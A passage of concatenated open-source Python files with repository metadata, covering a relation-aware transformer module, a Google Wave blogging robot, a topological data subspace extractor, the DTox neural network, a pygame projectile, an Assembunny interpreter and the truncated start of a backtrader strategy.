ValueError(f\"attention mask should be 2D or 3D, got {mask.dim()} dims\")\n\n    inverted_mask = 1.0 - expanded_mask\n    return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)\n\n\ndef relative_attention_logits(query, key, relation):\n    # We can't reuse the same logic as tensor2tensor because we don't share relation vectors across the batch.\n    # In this version, relation vectors are shared across heads.\n    # query: [batch, heads, num queries, depth].\n    # key: [batch, heads, num kvs, depth].\n    # relation: [batch, num queries, num kvs, depth].\n    # qk_matmul is [batch, heads, num queries, num kvs]\n    qk_matmul = torch.matmul(query, key.transpose(-2, -1))\n    # q_t is [batch, num queries, heads, depth]\n    q_t = query.permute(0, 2, 1, 3)\n    # r_t is [batch, num queries, depth, num kvs]\n    r_t = relation.transpose(-2, -1)\n    # [batch, num queries, heads, depth]\n    # * [batch, num queries, depth, num kvs]\n    # = [batch, num queries, 
heads, num kvs]\n # For each batch and query, we have a query vector per head.\n # We take its dot product with the relation vector for each kv.\n q_tr_t_matmul = torch.matmul(q_t, r_t)\n # qtr_t_matmul_t is [batch, heads, num queries, num kvs]\n q_tr_tmatmul_t = q_tr_t_matmul.permute(0, 2, 1, 3)\n # [batch, heads, num queries, num kvs]\n score = qk_matmul + q_tr_tmatmul_t # / math.sqrt(query.shape[-1])\n return score\n\n\n# Adapted from The Annotated Transformer\ndef relative_attention_values(weight, value, relation):\n # In this version, relation vectors are shared across heads.\n # weight: [batch, heads, num queries, num kvs].\n # value: [batch, heads, num kvs, depth].\n # relation: [batch, num queries, num kvs, depth].\n # wv_matmul is [batch, heads, num queries, depth]\n wv_matmul = torch.matmul(weight, value)\n\n # w_t is [batch, num queries, heads, num kvs]\n w_t = weight.permute(0, 2, 1, 3)\n\n # [batch, num queries, heads, num kvs]\n # * [batch, num queries, num kvs, depth]\n # = [batch, num queries, heads, depth]\n w_tr_matmul = torch.matmul(w_t, relation)\n\n # w_tr_matmul_t is [batch, heads, num queries, depth]\n w_tr_matmul_t = w_tr_matmul.permute(0, 2, 1, 3)\n\n return wv_matmul + w_tr_matmul_t\n\n\nclass BartRelativeAttention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n\n def __init__(\n self,\n embed_dim: int,\n num_heads: int,\n dropout: float = 0.0,\n bias: bool = True,\n ):\n super().__init__()\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.dropout = dropout\n self.head_dim = embed_dim // num_heads\n assert (\n self.head_dim * num_heads == self.embed_dim\n ), f\"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {num_heads}).\"\n self.scaling = self.head_dim ** -0.5\n\n self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n relation_k: torch.Tensor,\n relation_v: torch.Tensor,\n key_value_states: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n attention_mask: Optional[torch.Tensor] = None,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n \"\"\"Input shape: Batch x Time x Channel\"\"\"\n\n # if key_value_states are provided this layer is used as a cross-attention layer\n # for the decoder\n is_cross_attention = key_value_states is not None\n bsz, tgt_len, embed_dim = hidden_states.size()\n\n # get query proj\n query_states = self.q_proj(hidden_states) * self.scaling\n # get key, value proj\n if is_cross_attention and past_key_value is not None:\n # reuse k,v, cross_attentions\n key_states = past_key_value[0]\n value_states = past_key_value[1]\n elif is_cross_attention:\n # cross_attentions\n key_states = self._shape(self.k_proj(key_value_states), -1, bsz)\n value_states = self._shape(self.v_proj(key_value_states), -1, bsz)\n elif past_key_value is not None:\n # reuse k, v, self_attention\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n key_states = torch.cat([past_key_value[0], key_states], dim=2)\n value_states = 
torch.cat([past_key_value[1], value_states], dim=2)\n else:\n # self_attention\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n\n\n #proj_shape = (bsz * self.num_heads, -1, self.head_dim)\n query_states = self._shape(query_states, tgt_len, bsz)#.view(*proj_shape)\n # key_states = key_states.view(*proj_shape)\n # value_states = value_states.view(*proj_shape)\n src_len = key_states.size(2)\n\n attn_weights = relative_attention_logits(query_states, key_states, relation_k)\n #attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))\n\n if attention_mask is not None:\n if attention_mask.size() != (bsz, 1, tgt_len, src_len):\n raise ValueError(\n f\"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}\"\n )\n attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask\n #attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)\n attn_weights = F.softmax(attn_weights, dim=-1)\n attn_probs = F.dropout(attn_weights, p=self.dropout, training=self.training)\n attn_output = relative_attention_values(attn_probs,value_states,relation_v)\n #attn_output = torch.bmm(attn_probs, value_states)\n\n attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)\n\n attn_output = self.out_proj(attn_output)\n\n return attn_output,attn_weights\n\n\nclass BartEncoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.embed_dim = config.hidden_size\n self.self_attn = BartRelativeAttention(\n embed_dim=self.embed_dim,\n num_heads=config.encoder_attention_heads,\n dropout=config.attention_dropout,\n )\n self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n self.dropout = config.dropout\n self.activation_fn = F.gelu\n self.activation_dropout = config.activation_dropout\n self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)\n self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)\n self.final_layer_norm = nn.LayerNorm(self.embed_dim)\n\n self.relation_k_emb = nn.Embedding(config.num_relation_kinds, self.self_attn.head_dim)\n self.relation_v_emb = nn.Embedding(config.num_relation_kinds, self.self_attn.head_dim)\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: torch.Tensor,\n relation,\n ):\n \"\"\"\n Args:\n hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`\n attention_mask (:obj:`torch.FloatTensor`): attention mask of size\n `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.\n layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size\n `(encoder_attention_heads,)`.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. 
See ``attentions`` under\n                returned tensors for more detail.\n        \"\"\"\n        residual = hidden_states\n        # BartRelativeAttention returns (output, weights); only the output is needed here.\n        hidden_states, _ = self.self_attn(\n            hidden_states=hidden_states,\n            attention_mask=attention_mask,\n            relation_k=self.relation_k_emb(relation),\n            relation_v=self.relation_v_emb(relation),\n        )\n        hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n        hidden_states = residual + hidden_states\n        hidden_states = self.self_attn_layer_norm(hidden_states)\n\n        residual = hidden_states\n        hidden_states = self.activation_fn(self.fc1(hidden_states))\n        hidden_states = F.dropout(hidden_states, p=self.activation_dropout, training=self.training)\n        hidden_states = self.fc2(hidden_states)\n        hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n        hidden_states = residual + hidden_states\n        hidden_states = self.final_layer_norm(hidden_states)\n\n        if hidden_states.dtype == torch.float16 and (\n            torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()\n        ):\n            clamp_value = torch.finfo(hidden_states.dtype).max - 1000\n            hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)\n\n        return hidden_states\n\n\n
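# --- Usage sketch: a minimal smoke test for the relation-aware encoder layer. The\n# config attributes below (hidden_size, encoder_attention_heads, attention_dropout,\n# dropout, activation_dropout, encoder_ffn_dim, num_relation_kinds) are assumptions\n# inferred from the attribute reads in BartEncoderLayer.__init__, and the sizes are\n# illustrative; `relation` is a [batch, seq, seq] LongTensor of relation-kind ids,\n# as implied by the nn.Embedding lookups above. Kept commented out so importing\n# this module stays side-effect free.\n#\n# from types import SimpleNamespace\n# cfg = SimpleNamespace(hidden_size=64, encoder_attention_heads=4,\n#                       attention_dropout=0.1, dropout=0.1, activation_dropout=0.1,\n#                       encoder_ffn_dim=128, num_relation_kinds=3)\n# layer = BartEncoderLayer(cfg)\n# x = torch.randn(2, 10, 64)                          # [batch, seq, hidden]\n# rel = torch.zeros(2, 10, 10, dtype=torch.long)      # relation-kind ids\n# out = layer(x, attention_mask=None, relation=rel)   # -> [2, 10, 64]\n\n\n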
class RelDecoderLayer(nn.Module):\n    def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.gelu, num_relation_kinds=3):\n        super().__init__()\n        self.embed_dim = d_model\n\n        self.self_attn = BartRelativeAttention(\n            embed_dim=self.embed_dim,\n            num_heads=nhead,\n            dropout=dropout,\n        )\n\n        self.activation_fn = activation\n        self.dropout = dropout\n        self.activation_dropout = dropout\n\n        self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n        self.cross_attn = MultiheadAttention(self.embed_dim, nhead, dropout=dropout, batch_first=True)\n\n        self.cross_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n        self.fc1 = nn.Linear(self.embed_dim, dim_feedforward)\n        self.fc2 = nn.Linear(dim_feedforward, self.embed_dim)\n        self.final_layer_norm = nn.LayerNorm(self.embed_dim)\n\n        self.relation_k_emb = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n        self.relation_v_emb = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n\n        self.relation_k_emb_c = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n        self.relation_v_emb_c = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n\n    def set_relation(self, relation_map):\n        # Coerce the map to a LongTensor and store it with a leading batch axis;\n        # the original branch referenced an undefined name and only stored tensor inputs.\n        if not torch.is_tensor(relation_map):\n            relation_map = torch.tensor(relation_map, dtype=torch.long)\n        self.relation_map = relation_map.long()[None]\n\n    def forward(\n        self,\n        hidden_states: torch.Tensor,\n        attention_mask: Optional[torch.Tensor] = None,\n        encoder_hidden_states: Optional[torch.Tensor] = None,\n        encoder_attention_mask: Optional[torch.Tensor] = None,\n    ):\n\n        bs = hidden_states.shape[0]\n        decoder_relation = torch.repeat_interleave(self.relation_map, bs, 0).to(hidden_states.device)\n\n        residual = hidden_states\n\n        # Self Attention\n        hidden_states, attention_weight = self.self_attn(\n            hidden_states=hidden_states,\n            attention_mask=attention_mask,\n            relation_k=self.relation_k_emb(decoder_relation),\n            relation_v=self.relation_v_emb(decoder_relation),\n        )\n        hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n        hidden_states = residual + hidden_states\n        hidden_states = self.self_attn_layer_norm(hidden_states)\n\n        # Cross-Attention Block\n        if encoder_hidden_states is not None:\n            residual = hidden_states\n            # Use the encoder-side mask here; the decoder self-attention mask has the\n            # wrong key length for cross-attention.\n            hidden_states = self.cross_attn(hidden_states, encoder_hidden_states, encoder_hidden_states,\n                                            attn_mask=encoder_attention_mask)[0]\n            hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n            hidden_states = residual + hidden_states\n            hidden_states = self.cross_attn_layer_norm(hidden_states)\n\n        # Fully Connected\n        residual = hidden_states\n        hidden_states = self.activation_fn(self.fc1(hidden_states))\n        hidden_states = F.dropout(hidden_states, p=self.activation_dropout, training=self.training)\n        hidden_states = self.fc2(hidden_states)\n        hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n        hidden_states = residual + hidden_states\n        hidden_states = self.final_layer_norm(hidden_states)\n\n        return hidden_states, attention_weight\n\n\nclass TransformerRelDecoder(Module):\n    r\"\"\"TransformerRelDecoder is a stack of N relation-aware decoder layers.\n\n    Args:\n        decoder_layer: an instance of the RelDecoderLayer() class (required).\n        num_layers: the number of sub-decoder-layers in the decoder (required).\n        norm: the layer normalization component (optional).\n\n    Examples::\n        >>> decoder_layer = RelDecoderLayer(d_model=512, nhead=8)\n        >>> transformer_decoder = TransformerRelDecoder(decoder_layer, num_layers=6)\n        >>> # call set_relation() on each cloned layer before forward(); see the sketch below\n    \"\"\"\n    __constants__ = ['norm']\n\n    def __init__(self, decoder_layer, num_layers, norm=None):\n        super(TransformerRelDecoder, self).__init__()\n        self.layers = _get_clones(decoder_layer, num_layers)\n        self.num_layers = num_layers\n        self.norm = norm\n\n    def forward(self, tgt: Tensor, memory: Tensor) -> Tensor:\n        r\"\"\"Pass the inputs through the decoder layers in turn.\n\n        Args:\n            tgt: the sequence to the decoder (required).\n            memory: the sequence from the last layer of the encoder (required).\n        \"\"\"\n        output = tgt\n        attention_weights = []\n        for mod in self.layers:\n            output, att_w = mod(hidden_states=output, encoder_hidden_states=memory)\n            attention_weights.append(att_w)\n        if self.norm is not None:\n            output = self.norm(output)\n\n        return output, attention_weights\n\n\n
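# --- Usage sketch: wiring RelDecoderLayer into TransformerRelDecoder. Every cloned\n# layer reads self.relation_map in forward(), so set_relation() must be called on\n# each layer first; the 512/8/6 sizes are illustrative assumptions, not values\n# taken from this repo. Kept commented out so the module has no import-time side\n# effects.\n#\n# dec_layer = RelDecoderLayer(d_model=512, nhead=8, num_relation_kinds=3)\n# decoder = TransformerRelDecoder(dec_layer, num_layers=6)\n# rel = torch.zeros(20, 20, dtype=torch.long)     # [tgt_len, tgt_len] relation ids\n# for layer in decoder.layers:\n#     layer.set_relation(rel)\n# tgt = torch.rand(32, 20, 512)                   # batch_first: [batch, tgt_len, d]\n# memory = torch.rand(32, 10, 512)\n# out, attn_weights = decoder(tgt, memory)\n\n\n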
class PositionEmbedding(nn.Module):\n    def __init__(self, max_seq, max_ld_p, text_d, max_read=None):\n        super(PositionEmbedding,self).__init__()\n        self.index_p = nn.Embedding(max_seq,text_d)\n        self.ld_p = nn.Embedding(max_ld_p,text_d)\n        self.do_read = False\n        if max_read:\n            self.read_time = nn.Embedding(max_read, text_d)\n            self.do_read = True\n\n    def forward(self,x,position_idx,time_gap,read_time=None):\n        output = torch.zeros_like(x).to(x.device)\n        output += self.index_p(position_idx)\n        output += self.ld_p(time_gap)\n        if self.do_read:\n            output += self.read_time(read_time)\n        return output\n\n\nclass EmbeddingLayer(nn.Module):\n    def __init__(self, config):\n        super(EmbeddingLayer, self).__init__()\n        self.config = config\n\n        self.operator = nn.Embedding(config.operator_num, config.text_d)\n        self.browserType = nn.Embedding(config.browserType_num, config.text_d)\n        self.deviceType = nn.Embedding(config.deviceType_num, config.text_d)\n        self.osType = nn.Embedding(config.osType_num, config.text_d)\n        self.province = nn.Embedding(config.province_num, config.text_d)\n        self.city = nn.Embedding(config.city_num, config.text_d)\n\n        self.item_type = nn.Embedding(config.token_type_num, config.text_d)\n        self.session_p = nn.Embedding(config.max_session,config.text_d)\n\n        self.entity_num = nn.Embedding(config.max_entity_num, config.text_d)\n        self.entity_num_p = nn.Embedding(config.max_entity_num_p, config.text_d)\n        self.entity_num_n = nn.Embedding(config.max_entity_num_n, config.text_d)\n        self.entity_num_z = nn.Embedding(config.max_entity_num_z, config.text_d)\n\n    def user_embedding(self, input):\n        operator_id, browserType_id, deviceType_id, osType_id, province_id, city_id = input\n        operator = self.operator(operator_id)\n        browserType = self.browserType(browserType_id)\n        deviceType = self.deviceType(deviceType_id)\n        osType = self.osType(osType_id)\n        province = self.province(province_id)\n        city = self.city(city_id)\n        user_embedding = operator + browserType + deviceType + osType + province + city\n        return user_embedding\n\n    def item_embedding(self, input):\n        text_type, session_ids = input\n        type_embedding = self.item_type(text_type)\n        session_embedding = self.session_p(session_ids)\n        #word_embedding = self.word_project(word_vector)\n        item_embedding = type_embedding + session_embedding\n        return item_embedding\n\n\n    def entity_embedding(self,entityInput):\n        e_num, p_num, n_num, z_num = entityInput\n        e_embedding = self.entity_num(e_num)\n        p_embedding = self.entity_num_p(p_num)\n        n_embedding = self.entity_num_n(n_num)\n        z_embedding = self.entity_num_z(z_num)\n        return e_embedding + p_embedding + n_embedding + z_embedding\n\n    def forward(self, userInput, itemInput, entityInput):\n        user_embedding = self.user_embedding(userInput)\n        item_embedding = self.item_embedding(itemInput)\n        entity_embedding = self.entity_embedding(entityInput)\n        embeddings = item_embedding + user_embedding.unsqueeze(1) + entity_embedding\n        return embeddings","repo_name":"zhengyanzhao1997/COOP","sub_path":"src/transformers_model/transformer_util.py","file_name":"transformer_util.py","file_ext":"py","file_size_in_byte":56838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"71370584785","text":"__authors__ = ['douwe@google.com (Douwe Osinga)',\n               'davidbyttow@google.com (David Byttow)']\n\n\nimport logging\nimport os\nimport urllib\n\nfrom api import document\nfrom api import events\nfrom api import robot\nimport model\n\n# Globals\nROBOT_NAME = 'bloggy'\n\n# If set to true, skip the confirmation dialog\nPUBLISH_IMMEDIATELY = True\n\n\ndef IsProd():\n  # If hosting from prod, use the public wave sandbox.\n  return os.environ['HTTP_HOST'].endswith('.appspot.com')\n\n\ndef GetKnownDomains():\n  if IsProd():\n    return set(['wavesandbox.com'])\n  return set(['google.com', 'gwave.com', 'gmail.com'])\n\n\ndef GetRobotId():\n  if IsProd():\n    return 'blog-wave'\n  return 'bloggy'\n\n\ndef StripKnownDomains(p):\n  address, domain = p.split('@', 1)\n  if domain in GetKnownDomains():\n    return address\n  else:\n    return p\n\n\ndef IsBloggy(participant):\n  return (participant.startswith(GetRobotId())\n          or participant.endswith('@corp.google.com'))\n\n\ndef PublishBlog(wavelet):\n  author = StripKnownDomains(wavelet.GetCreator())\n  title = 'Untitled'\n  if wavelet.GetTitle():\n    title = wavelet.GetTitle().splitlines()[0]\n  post = model.BlogPost(title=title,\n                        author=author,\n                        waveid=wavelet.GetWaveId())\n  post.put()\n  url = 'http://' + os.environ['HTTP_HOST'] + '/' + urllib.quote(author)\n  
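# Record the published URL in the wave's data document so clients can tell the\n  # wave has been published, then make it world-readable via the public group.\n  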
wavelet.SetDataDocument('/published/blog-wave@appspot.com', url)\n wavelet.AddParticipant(\"public@a.gwave.com\")\n\n\ndef InsertPublishForm(blip, title):\n form = blip.GetDocument().InsertInlineBlip(1).GetDocument()\n form.AppendText('\\nDo you want to publish this wave to a blog '\n 'and that way share it with the entire world?\\n')\n form.AppendElement(\n document.FormElement(\n document.ELEMENT_TYPE.BUTTON,\n 'publish',\n value='Publish!',\n ))\n form.AppendElement(\n document.FormElement(\n document.ELEMENT_TYPE.BUTTON,\n 'nothanks',\n value='No thanks',\n ))\n\n\ndef OnParticipantsChanged(properties, context):\n \"\"\"Invoked when any participants have been added/removed from the wavelet.\"\"\"\n added = properties['participantsAdded']\n for participant in added:\n if IsBloggy(participant):\n wavelet = context.GetRootWavelet()\n if PUBLISH_IMMEDIATELY:\n PublishBlog(wavelet)\n else:\n title = 'Untitled'\n if wavelet.GetTitle():\n title = wavelet.GetTitle().splitlines()[0]\n blip = context.GetBlipById(wavelet.GetRootBlipId())\n InsertPublishForm(blip, title)\n break;\n\n\ndef OnButtonClicked(properties, context):\n wavelet = context.GetRootWavelet()\n blip = context.GetBlipById(properties['blipId'])\n blip.Delete()\n if properties['button'] == 'publish':\n PublishBlog(wavelet)\n\n\nif __name__ == '__main__':\n bloggy = robot.Robot(ROBOT_NAME.capitalize(),\n image_url='http://blog-wave.appspot.com/inc/blogger.png',\n profile_url='http://www.blogger.com')\n bloggy.RegisterHandler(events.WAVELET_PARTICIPANTS_CHANGED,\n OnParticipantsChanged)\n bloggy.RegisterHandler(events.FORM_BUTTON_CLICKED,\n OnButtonClicked)\n bloggy.Run(debug=True)\n","repo_name":"JackDanger/google-wave-samples","sub_path":"extensions/robots/python/bloggy/bloggy.py","file_name":"bloggy.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"22685042785","text":"import numpy as np\nfrom gtda.diagrams import PairwiseDistance\nfrom joblib import Parallel, delayed\nfrom scipy.spatial.distance import squareform, pdist\nfrom sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\n\n\nclass SubSpaceExtraction(BaseEstimator, TransformerMixin):\n def __init__(self,\n dist_percentage=0.05,\n k_min=10,\n k_max=100,\n metric=\"euclidean\",\n n_jobs=-1):\n self.n_jobs = n_jobs\n self.dist_percentage = dist_percentage\n self.k_min = k_min\n self.k_max = k_max\n self.metric = metric\n\n def _select_subspace(self, space, label, matrix_distances, ind_x):\n target_vector_dist = matrix_distances[ind_x]\n max_dist = np.max(target_vector_dist) * self.dist_percentage\n\n indexes = target_vector_dist < max_dist\n if np.sum(indexes) > self.k_max:\n indexes = np.argsort(target_vector_dist)[:self.k_max]\n elif np.sum(indexes) < self.k_min:\n indexes = np.argsort(target_vector_dist)[:self.k_min]\n\n return space[indexes], label[indexes]\n\n def fit_transform_resample(self, X, y):\n self.fit(X, y)\n return self.transform(X, y)\n\n def fit(self, X, y):\n return self\n\n def transform(self, X, y):\n \"\"\" The transform method takes as input an array of dimension (n_sample, n_features) and for each sample\n it creates the neighourood point clouds.\"\"\"\n def compute_all_distances(X, metric):\n if metric == \"euclidean\":\n return squareform(pdist(X, metric))\n else:\n return PairwiseDistance(metric=metric, n_jobs=self.n_jobs).fit_transform(X)\n\n distance_matrix = compute_all_distances(X, self.metric)\n\n Xy_list = 
Parallel(n_jobs=self.n_jobs)(delayed(self._select_subspace)(X, y, distance_matrix, i) for i in range(len(X)))\n\n max_n_points = np.max([x[0].shape[0] for x in Xy_list])\n\n X_new_dims = list(X.shape)\n X_new_dims.insert(1, max_n_points)\n\n X_new = np.empty(X_new_dims)\n y_new = np.full((X.shape[0], max_n_points), np.nan)\n\n for i, element in enumerate(Xy_list):\n X_new[i, :len(element[0])] = element[0]\n X_new[i, len(element[0]):] = element[0][-1]\n y_new[i, :len(element[1])] = element[1]\n\n return X_new, (y_new, X)\n\n","repo_name":"giotto-ai/football-tda","sub_path":"sub_space_extraction.py","file_name":"sub_space_extraction.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"71217300306","text":"# !/usr/bin/env python\n## created by Yun Hao @MooreLab 2021\n## This script contains functions used to build basic neural network structure for DTox model\n\n\n## Module\nimport torch\nfrom torch import nn\n\n \n## This function defines a root loss-oriented neural network structure for each node module \nclass DToxNetModule(nn.Module):\n\t## 0. Input arguments \n\t\t# M_in: number of input neurons \n\t\t# M_out: number of output neurons \n\t\n\t## 1. Define module parameters \n\tdef __init__(self, M_in, M_out):\n\t\tsuper(DToxNetModule, self).__init__()\n\t\tself.linear = nn.Linear(M_in, M_out)\n\t\tself.activate = nn.ReLU()\n\t\n\t## 2. Define forward function \t\n\tdef forward(self, x):\n\t\t# linear transformation\n\t\tm_linear = self.linear(x)\n\t\t# nonlinear ReLU activation\n\t\tm_active = self.activate(m_linear)\n\t\treturn m_active\n\n\n## This function defines an anxiliary loss-oriented neural network structure for each node module\nclass DToxNetAuxiliary(nn.Module):\n\t## 0. Input arguments\n\t\t# M_in: number of input neurons \n\n\t## 1. Define module parameters \n\tdef __init__(self, M_in):\n\t\tsuper(DToxNetAuxiliary, self).__init__()\n\t\tself.linear = nn.Linear(M_in, 1)\n\t\tself.sigmoid = nn.Sigmoid()\n\n\t## 2. Define forward function \n\tdef forward(self, x):\n\t\t# linear transformation\n\t\tm_linear = self.linear(x)\n\t\t# nonlinear sigmoid activation\n\t\tm_sigmoid = self.sigmoid(m_linear)\n\t\treturn m_sigmoid\n\n\n## This function defines the structure of whole neural network for DTox model\nclass DToxNet(nn.Module):\n\t## 0. Input arguments\n\t\t# node_children_dict: dictionary that contains children nodes of each parent node in DTox model \n\t\t# input_module_size: list/array that contains the input size of each node module in DTox model \n\t\t# output_module_size: list/array that contains the input size of each node module in DTox model \n\t\t# root: list/array that contains number IDs of root pathways in DTox model\n\t\t# output_root_size: size of root module in DTox model \n\t\t# input_feature_size: number of input features \n\n\t## 1. 
Define neural network parameters \n\tdef __init__(self, node_children_dict, input_module_size, output_module_size, root, output_root_size, input_feature_size):\n\t\tsuper(DToxNet, self).__init__()\n\t\t# iterate by order of node module in DTox model\n\t\tself.net = nn.ModuleList()\n\t\tself.auxiliary = nn.ModuleList()\n\t\tfor lims in range(0, len(input_module_size)):\n\t\t\t# define root loss-oriented structure for the current node \n\t\t\tnet_module = DToxNetModule(input_module_size[lims], output_module_size[lims])\n\t\t\tself.net.append(net_module)\n\t\t\t# define auxiliary loss-oriented structure for the current node \n\t\t\tauxiliary_module = DToxNetAuxiliary(output_module_size[lims])\n\t\t\tself.auxiliary.append(auxiliary_module)\n\t\t# define structure for root module\n\t\tself.output_layer = DToxNetAuxiliary(output_root_size)\n\t\t# define other parameters\n\t\tself.node_children = node_children_dict\n\t\tself.root_node = root\n\t\tself.input_size = input_feature_size\n\t\tself.hidden_size = len(input_module_size)\n\t\tself.combine_size = input_feature_size + len(input_module_size)\n\n\t## 2. Define forward function \n\tdef forward(self, x):\n\t\t# iterate by order of input features, assign feature values to result list \n\t\tlayer_result = [0] * self.combine_size\n\t\tauxiliary_result = [0] * self.hidden_size\n\t\tfor sis in range(0, self.input_size):\n\t\t\t# assign values of current feature to result list\n\t\t\tlayer_result[sis] = x[:, sis:(sis+1)]\n\t\t# iterate by order of hidden node modules \n\t\tfor scs in range(self.input_size, self.combine_size):\n\t\t\t# obtain input values for the current node \n\t\t\tscs_children = self.node_children[scs]\n\t\t\tscs_children_output_list = [layer_result[sc] for sc in scs_children]\n\t\t\tscs_children_output = torch.cat(scs_children_output_list, 1)\n\t\t\t# feed input values into root loss-oriented structure to compute node output \n\t\t\tscs_net_id = scs - self.input_size\n\t\t\tlayer_result[scs] = self.net[scs_net_id](scs_children_output)\n\t\t\t# feed input values into auxiliary loss-oriented structure to compute auxiliary node output\n\t\t\tauxiliary_result[scs_net_id] = self.auxiliary[scs_net_id](layer_result[scs])\n\t\t# obtain values for root node \n\t\troot_output_list = [layer_result[srn] for srn in self.root_node]\n\t\troot_output = torch.cat(root_output_list, 1)\n\t\t# feed values into root structure to compute final output \n\t\ty_pred = self.output_layer(root_output)\n\t\treturn y_pred, auxiliary_result\n","repo_name":"yhao-compbio/DTox","sub_path":"src/dtox_nn.py","file_name":"dtox_nn.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
+{"seq_id":"13667035677","text":"import pygame\r\n\r\n# Define the class that manages the player's projectile\r\n\r\nclass Projectile(pygame.sprite.Sprite):\r\n    def __init__(self, player):\r\n        super().__init__()\r\n        self.velocity = 5\r\n        self.player = player\r\n        self.image = pygame.image.load('assets/rasengan.png')\r\n        self.image = pygame.transform.scale(self.image, (45, 45))\r\n        self.damage = 5\r\n        self.rect = self.image.get_rect()\r\n        self.rect.x = player.rect.x\r\n        self.rect.y = player.rect.y + 193\r\n\r\n    def remove(self):\r\n        # remove the projectile once it is off screen\r\n        self.player.all_projectiles.remove(self)\r\n\r\n    def move(self):\r\n        self.rect.x += self.velocity\r\n\r\n        # check whether the projectile has left the screen\r\n        if self.rect.x > 1080:\r\n            
self.remove()\r\n","repo_name":"mansourb4/1st_Game","sub_path":"1st-Game-master/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21609997742","text":"from utils import lines, read_data\n\n\nclass AssembunnyRunner(object):\n def __init__(self, data, initial=None):\n self.registers = {'a': 0, 'b': 0, 'c': 0, 'd': 0}\n self.registers.update(initial if initial is not None else {})\n self.instructions = [line.split(' ', 1) for line in lines(data)]\n\n def parse_value(self, source):\n try:\n return int(source)\n except ValueError:\n return self.registers[source]\n\n def __call__(self):\n i = 0\n while i < len(self.instructions):\n inst, args = self.instructions[i]\n if inst == 'cpy':\n source, target = args.split(' ')\n self.registers[target] = self.parse_value(source)\n elif inst == 'inc':\n self.registers[args] += 1\n elif inst == 'dec':\n self.registers[args] -= 1\n elif inst == 'jnz':\n flag, offset = args.split(' ')\n if self.parse_value(flag):\n i += int(offset) - 1\n i += 1\n\n\ndef get_a_register(data, initial=None):\n runner = AssembunnyRunner(data, initial)\n runner()\n return runner.registers['a']\n\n\nif __name__ == '__main__':\n data = read_data(12)\n\n assert get_a_register(\n \"\"\"\n cpy 41 a\n inc a\n inc a\n dec a\n jnz a 2\n dec a\n \"\"\"\n ) == 42\n print(\"All tests passed\")\n\n print(get_a_register(data))\n print(get_a_register(data, {'c': 1}))\n","repo_name":"julianandrews/adventofcode","sub_path":"2016/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"11310996486","text":"import backtrader as bt\nimport backtrader.indicators as btind\nfrom spe.cust_ind import NEW_HIGH_STOP70\nfrom spe.cust_ind import NEW_HIGH\n\nclass abcd(bt.Strategy):\n params = (\n ('trade_size', 1),\n ('benchmark_name', 